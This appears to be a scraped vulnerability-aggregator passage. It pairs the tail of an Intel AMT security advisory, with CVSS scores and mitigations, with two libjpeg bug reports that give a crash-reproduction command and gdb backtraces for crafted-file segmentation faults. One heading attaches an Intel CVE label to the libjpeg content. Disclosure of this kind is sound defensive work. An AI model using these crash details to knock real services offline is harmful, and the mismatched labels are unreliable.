
CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

CVEID: CVE-2022-30944

Description: Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 7.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

CVEID: CVE-2022-28697

Description: Improper access control in firmware for Intel(R) AMT and Intel(R) Standard Manageability may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

**Affected Products:**

All versions of Intel® AMT and Intel® Standard Manageability.

Note: Firmware versions of Intel® AMT 3.x through 10.x are no longer supported versions. There is no new general release planned for these versions.

Intel will only provide prescriptive guidance for supported versions; no code changes are planned.

**Recommendations:**

Intel recommends that users follow the steps below to address these issues:

For Intel® AMT and Intel® Standard Manageability, Intel recommends users follow existing security best practices and alternate security controls, including:

*   CVE-2022-30944, CVE-2022-30601: Enable Transport Layer Security (TLS) for Intel® AMT and Intel® Standard Manageability.
*   CVE-2022-28697: Enable BIOS password protection on the Intel® Management Engine BIOS Extension (Intel® MEBX).  Intel recommends end-users to reset and then set non-default password for Intel® AMT or Intel® Standard Manageability immediately following receipt of the system from the systems manufacturer.

Additional guidance is provided at this support page.

**Acknowledgements:**

Intel would like to thank Seth W Dailey (Z-winK) for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-30944: INTEL-SA-00709

libjpeg commit 281daa9 was discovered to contain a segmentation fault via LineMerger::GetNextLowpassLine at linemerger.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

Hi, there.

There is a segmentation fault in the newest master branch.

Here is the reproducing command:  
jpeg poc /dev/null

    (gdb) bt
    #0  0x00007ffff7f31270 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x0000000000711b6f in LineMerger::GetNextLowpassLine (this=0x85ed20, comp=2 '\002')
        at linemerger.cpp:262
    #2  0x00000000007127d2 in LineMerger::GetNextExpandedLowPassLine (this=0x85ed20,
        comp=<optimized out>) at linemerger.cpp:339
    #3  0x0000000000713251 in LineMerger::GetNextLine (this=0x85ed20, comp=2 '\002')
        at linemerger.cpp:360
    #4  0x000000000071c2dd in HierarchicalBitmapRequester::Pull8Lines (this=0x792720,
        c=<optimized out>) at hierarchicalbitmaprequester.cpp:447
    #5  0x0000000000720156 in HierarchicalBitmapRequester::ReconstructRegion (this=0x792720,
        orgregion=..., rr=0x7fffffffdae8) at hierarchicalbitmaprequester.cpp:739
    #6  0x000000000045c501 in Image::ReconstructRegion (this=0x7923b0, bmh=0x7fffffffd790,
        rr=0x7fffffffdae8) at image.cpp:1115
    #7  0x000000000043e266 in JPEG::InternalDisplayRectangle (this=0x7904c8, tags=0x7fffffffde90)
        at jpeg.cpp:721
    #8  0x000000000043e14b in JPEG::DisplayRectangle (this=0x7904c8, tags=0x7fffffffde90)
        at jpeg.cpp:699
    #9  0x000000000041e336 in Reconstruct (infile=<optimized out>,
        outfile=0x7fffffffe704 "/dev/null", colortrafo=1,
        alpha=0x790280 "\230$\255", <incomplete sequence \373>, upsample=true)
        at reconstruct.cpp:331
    #10 0x0000000000408b6a in main (argc=<optimized out>, argv=0x87a720) at main.cpp:747
    

poc.zip

CVE-2022-37770: Segmentation fault in LineMerger::GetNextLowpassLine · Issue #79 · thorfdbg/libjpeg

libjpeg commit 281daa9 was discovered to contain a segmentation fault via HuffmanDecoder::Get at huffmandecoder.hpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

Hi, there.

There is a segmentation fault in the newest master branch.

    Program received signal SIGSEGV, Segmentation fault.
    HuffmanDecoder::Get (this=0x0, io=0x7933c8)
        at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112
    warning: Source file is more recent than executable.
    (gdb) bt
    #0  HuffmanDecoder::Get (this=0x0, io=0x7933c8)
        at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112
    #1  0x0000000000491388 in LosslessScan::ParseMCU (this=0x793250, prev=0x7fffffffda90,
        top=0x7fffffffda70) at losslessscan.cpp:374
    #2  0x0000000000491b4a in LosslessScan::ParseMCU (this=0x793250)
        at losslessscan.cpp:440
    #3  0x000000000043aca1 in JPEG::ReadInternal (this=0x7904c8, tags=0x7fffffffdd40)
        at jpeg.cpp:345
    #4  0x000000000043988b in JPEG::Read (this=0x7904c8, tags=0x7fffffffdd40)
        at jpeg.cpp:210
    #5  0x000000000041cabb in Reconstruct (infile=<optimized out>,
        outfile=0x7fffffffe6fc "/dev/null", colortrafo=1, alpha=0x0, upsample=true)
        at reconstruct.cpp:121
    #6  0x0000000000408b6a in main (argc=<optimized out>, argv=0x0) at main.cpp:747

Tag

#ssl